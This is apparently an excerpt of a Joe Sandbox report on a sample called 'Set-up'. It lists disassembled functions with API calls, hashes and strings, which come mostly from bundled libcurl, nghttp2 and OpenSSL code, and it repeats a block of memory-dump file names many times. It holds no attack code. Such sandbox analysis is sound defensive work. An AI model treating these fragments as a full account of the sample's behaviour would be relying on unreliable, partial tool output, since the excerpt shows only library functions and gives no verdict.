Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: memchrstrlen
String ID: HTTP/$Invalid status line$RTSP/$Received HTTP/0.9 when not allowed
API String ID: 1715104208-1496966621
Opcode ID: 9439b4d849e12de31cc0c2e602a2e15f131f51c50ca2feb38418e6e05f0acfa4
Instruction ID: 9b4eece0cc6eb4f4aa9d947a2f68650e812a4ddccd718479911a11805b92f923
Opcode Fuzzy Hash: 9439b4d849e12de31cc0c2e602a2e15f131f51c50ca2feb38418e6e05f0acfa4
Instruction Fuzzy Hash: 7FB11AB1A153667BD710AEA4AC81B6B76D8AF50304F044438FE8997242EF75EC64CB93

Function 002BE1F0 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 158COMMON

Download Yara Rule

APIs

_time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 002BE209

Part of subcall function 002B4620: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000004,?,?,00000000,?,002C1478,?,?,?), ref: 002B4643

Strings

SFTP Protocol Error, xrefs: 002BE3AA
Error waiting for FXP STATUS, xrefs: 002BE3BD
Unable to allocate memory for FXP_REMOVE packet, xrefs: 002BE374
Unable to send FXP_REMOVE command, xrefs: 002BE36B
SFTP unlink packet too short, xrefs: 002BE35A

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: _time64memcpy
String ID: Error waiting for FXP STATUS$SFTP Protocol Error$SFTP unlink packet too short$Unable to allocate memory for FXP_REMOVE packet$Unable to send FXP_REMOVE command
API String ID: 1622878224-2749593575
Opcode ID: a85efdd1359bff1f7cfa04e0539962d1888b5384bfe3e9d1efbaaf1f6c57696c
Instruction ID: 8b87a82ce61c63194166e5f26ef465d0c2f14d27400dff27f44e12356de56e7a
Opcode Fuzzy Hash: a85efdd1359bff1f7cfa04e0539962d1888b5384bfe3e9d1efbaaf1f6c57696c
Instruction Fuzzy Hash: AC51B370924301ABDB209F24DC45BEB7BE4EF40354F05896DF95A97292E371A824CBA2

Function 0025C560 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 147COMMON

Download Yara Rule

Strings

nghttp2_session.c, xrefs: 0025C9C0, 0025C9D5, 0025C9EA
stream->queued == 1, xrefs: 0025C9C5
urgency < NGHTTP2_EXTPRI_URGENCY_LEVELS, xrefs: 0025C9DA

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID:
String ID: nghttp2_session.c$stream->queued == 1$urgency < NGHTTP2_EXTPRI_URGENCY_LEVELS
API String ID: 0-1712496329
Opcode ID: c1a49396935d11c8a94a4be014bda76e79ea010ef3433427f0be303db6f88e00
Instruction ID: 666715b3bd4ec5eb6bd8107bc54f636986b9a325347b7ef9589feb5add481b6c
Opcode Fuzzy Hash: c1a49396935d11c8a94a4be014bda76e79ea010ef3433427f0be303db6f88e00
Instruction Fuzzy Hash: E64157B06207412FDB158A789C95BB677C8EF41303F180068FC59D91C2FB659A788B59

Function 001D6220 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 143stringCOMMON

Download Yara Rule

APIs

_time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 001D623A
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 001D624D
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 001D627C
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 001D6389

Strings

., xrefs: 001D6399
hsts.c, xrefs: 001D62C9, 001D62DB, 001D6339, 001D634B

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: strlen$_time64memcpy
String ID: .$hsts.c
API String ID: 2198566249-2242870694
Opcode ID: a5bfce280f639383adc23bf61ef3841af05f4179f746ec16b57ef7f9032a80f0
Instruction ID: a4f7ee56012453fa1ae8c88f017e2749f007b3d4d717642ca9ed792d463187d0
Opcode Fuzzy Hash: a5bfce280f639383adc23bf61ef3841af05f4179f746ec16b57ef7f9032a80f0
Instruction Fuzzy Hash: A441E9F6D083446BEB107A64AC4676B3698AB74314F08043AFD4D97383F775A9188692

Function 00554430 Relevance: 10.6, APIs: 7, Instructions: 108stringnetworkCOMMON

Download Yara Rule

APIs

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,0000002E), ref: 0055447B
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000042), ref: 005544C4
WSAStringToAddressW.WS2_32(?,00000002,00000000,?,00000010), ref: 005544E3
strlen.API-MS-WIN-CRT-STRING-L1-1-0(0000002E), ref: 00554500
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 0055450B
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,0000002E), ref: 0055451F
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 00554546

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: strlen$strcmp$AddressByteCharMultiStringWide
String ID:
API String ID: 389649969-0
Opcode ID: db40a967e8e176c32e87be48978d243b27f126d84ebbab2d9221fe4e1b613e71
Instruction ID: 383ce1f797362be73062f8d563c86417698a5dbec6e61a6e80b4fb48bee57703
Opcode Fuzzy Hash: db40a967e8e176c32e87be48978d243b27f126d84ebbab2d9221fe4e1b613e71
Instruction Fuzzy Hash: 77315BB190434567FB209A34DC55BFF7A8CAB9135AF04422AFC58961C1FA74AD8C8652

Function 003EE110 Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 90stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 003EE16C
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 003EE17B

Strings

Ente, xrefs: 003EE145
crypto/ui/ui_lib.c, xrefs: 003EE195
, xrefs: 003EE14D
:, xrefs: 003EE15C
for, xrefs: 003EE154

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: strlen
String ID: $ for$:$Ente$crypto/ui/ui_lib.c
API String ID: 39653677-4294831502
Opcode ID: 76abedffd1bd4cb8fcb0f3760f7be01381804532c8ea16f394447a7e21d5d2df
Instruction ID: e569ff3c42b6f59f7c2b8e7bf15a77c8b14aa80d38a2c05b2ed1ea7dd361dc23
Opcode Fuzzy Hash: 76abedffd1bd4cb8fcb0f3760f7be01381804532c8ea16f394447a7e21d5d2df
Instruction Fuzzy Hash: 9421D7F2E043607BE2116A16AC42D6B7BECEE91794F0A8539FD1C96242F735D914C2A3

Function 00412240 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,0040F763,?,?,?,?,?), ref: 00412251
WideCharToMultiByte.KERNEL32 ref: 00412284
WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000), ref: 004122BD

Strings

users/e_capi.c, xrefs: 00412299, 004122D0, 00412342
users/e_capi_err.c, xrefs: 00412321
ERR_CAPI_error, xrefs: 0041231A

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: ByteCharMultiWide$wcslen
String ID: ERR_CAPI_error$users/e_capi.c$users/e_capi_err.c
API String ID: 1062461220-336193293
Opcode ID: 83329d420772549b40809c07f4b58943159637d467be57547b70af0abe332132
Instruction ID: a00551d0a8dc0e9f44678a57150a3bd4c387c4fd8bff810a103762d96b5e2409
Opcode Fuzzy Hash: 83329d420772549b40809c07f4b58943159637d467be57547b70af0abe332132
Instruction Fuzzy Hash: AD210775E183086BE2203B71AD0AF273548EB41714F14417AF918992C2F7FC88A55796

Function 002787E0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 61COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(n <= balloc->blklen,nghttp3_balloc.c,00000042,?,00000000,?,00274D5A,00000000,?,000001F0), ref: 00278861
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(((uintptr_t)balloc->buf.last & 0xfu) == 0,nghttp3_balloc.c,00000055,?,000001F0), ref: 00278873

Strings

((uintptr_t)balloc->buf.last & 0xfu) == 0, xrefs: 0027886E
ZM', xrefs: 002787E7, 00278807
n <= balloc->blklen, xrefs: 0027885C
nghttp3_balloc.c, xrefs: 00278857, 00278869

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: _assert
String ID: ((uintptr_t)balloc->buf.last & 0xfu) == 0$ZM'$n <= balloc->blklen$nghttp3_balloc.c
API String ID: 1222420520-3478452804
Opcode ID: f2f21ac18e8086b7a7f1ef0f32df0c9b22e6fc7e4d159da92e73de7a053709fb
Instruction ID: 8bcf3e9601199f2367f3207a0abf6ace4ca4cea4323dbc25e733b679e8ab9c84
Opcode Fuzzy Hash: f2f21ac18e8086b7a7f1ef0f32df0c9b22e6fc7e4d159da92e73de7a053709fb
Instruction Fuzzy Hash: F11148B6A50706ABD7008F64EC45E1AB368FF41721B048A24F828D33D2CB30E820CBE1

Function 003881F0 Relevance: 9.2, APIs: 5, Strings: 1, Instructions: 198stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,0032A9CE,000000D2), ref: 003883A3
strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0032A9CE), ref: 003883C6

Part of subcall function 003860E0: GetLastError.KERNEL32(00387CCC,?,00000000,00387127,00387CCC,00000000,003ACAB7,001D1A70), ref: 003860E3
Part of subcall function 003860E0: SetLastError.KERNEL32(00000000), ref: 003861A5

Strings

crypto/err/err_local.h, xrefs: 00388311, 00388332, 00388385, 003883E8, 003884BB

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: ErrorLast$strcpystrlen
String ID: crypto/err/err_local.h
API String ID: 542397150-344804083
Opcode ID: 44b8b9e5f2a1c460aea476c1b70015f8a75b75608a4abb461a6744f0d7e296c0
Instruction ID: dd5bebb136d8d87f8940661fb88730325f31ca5c2739069fceea4ddd9e8439bb
Opcode Fuzzy Hash: 44b8b9e5f2a1c460aea476c1b70015f8a75b75608a4abb461a6744f0d7e296c0
Instruction Fuzzy Hash: 758195B1904B02AFE7239F28E885BF2B7D4FB4430CF454D58E995872A5DB79A824CB50

Function 001D6730 Relevance: 9.2, APIs: 3, Strings: 3, Instructions: 179stringCOMMON

Download Yara Rule

APIs

Part of subcall function 001D73F0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,#HttpOnly_,?,001DCA95,007EE878,00000467,mprintf.c), ref: 001D741D
Part of subcall function 001D73F0: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000008,?,00000001), ref: 001D7445

Part of subcall function 002147D0: fgets.API-MS-WIN-CRT-STDIO-L1-1-0(00000080,00000080,?), ref: 002147FB
Part of subcall function 002147D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 0021480C
Part of subcall function 002147D0: feof.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 00214837

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000001), ref: 001D6844
memcmp.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,unlimited,0000000A), ref: 001D6876
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 001D68FD

Strings

unlimited, xrefs: 001D686C
%256s "%64[^"]", xrefs: 001D6857
hsts.c, xrefs: 001D6748, 001D675D, 001D6777, 001D691D, 001D694E, 001D696F

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: strlen$feoffgetsmemcmpmemcpy
String ID: %256s "%64[^"]"$hsts.c$unlimited
API String ID: 288886899-2895786126
Opcode ID: c8a2e5cfc1f1c77025ca3d3ac2c570e30b80bbf805c6994e094026f82077bf1d
Instruction ID: c7570a96ff6a2b10ba44db55cbf3e8902e5b4fdea156c18f70cb3ab62d5f2e67
Opcode Fuzzy Hash: c8a2e5cfc1f1c77025ca3d3ac2c570e30b80bbf805c6994e094026f82077bf1d
Instruction Fuzzy Hash: FF5127B19483817BD724AB209C43A6B76D8AF99704F14482AFC48A63C3F735EE14D793

Function 003867F0 Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 117stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 0038691C

Strings

error:%08lX:%s:%s:%s, xrefs: 003868FE
reason(%lu), xrefs: 003868E1
err:%lx:%lx:%lx:%lx, xrefs: 00386933
check password, OpenSSL error %s, xrefs: 003868B4, 003868E0, 0038692B, 00386957
lib(%lu), xrefs: 0038689A

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: strlen
String ID: check password, OpenSSL error %s$err:%lx:%lx:%lx:%lx$error:%08lX:%s:%s:%s$lib(%lu)$reason(%lu)
API String ID: 39653677-2774124492
Opcode ID: 37da2311d31575bf6f5b7574c178de617fda7aa93bbd8752d809cc26abd3f259
Instruction ID: 964d27b6a5aadac5f6aada34980901e53eb7c28badc200901c2c15af45beb5bf
Opcode Fuzzy Hash: 37da2311d31575bf6f5b7574c178de617fda7aa93bbd8752d809cc26abd3f259
Instruction Fuzzy Hash: 05315AB6A043007BF7227A149C47FAB769CDB91354F050038FD5C96292F736AD58C7A2

Function 003C8240 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 63stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000001,003C9265,?,00000400,00000000,?), ref: 003C8254
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,003C9265,?), ref: 003C8264
memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,003C9265,?,?,?,?,?,?,003C9265,?,00000400,00000000,?), ref: 003C82C7

Strings

crypto/pem/pem_lib.c, xrefs: 003C82A8
PEM_def_callback, xrefs: 003C82A1
Enter PEM pass phrase:, xrefs: 003C8279, 003C828C

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
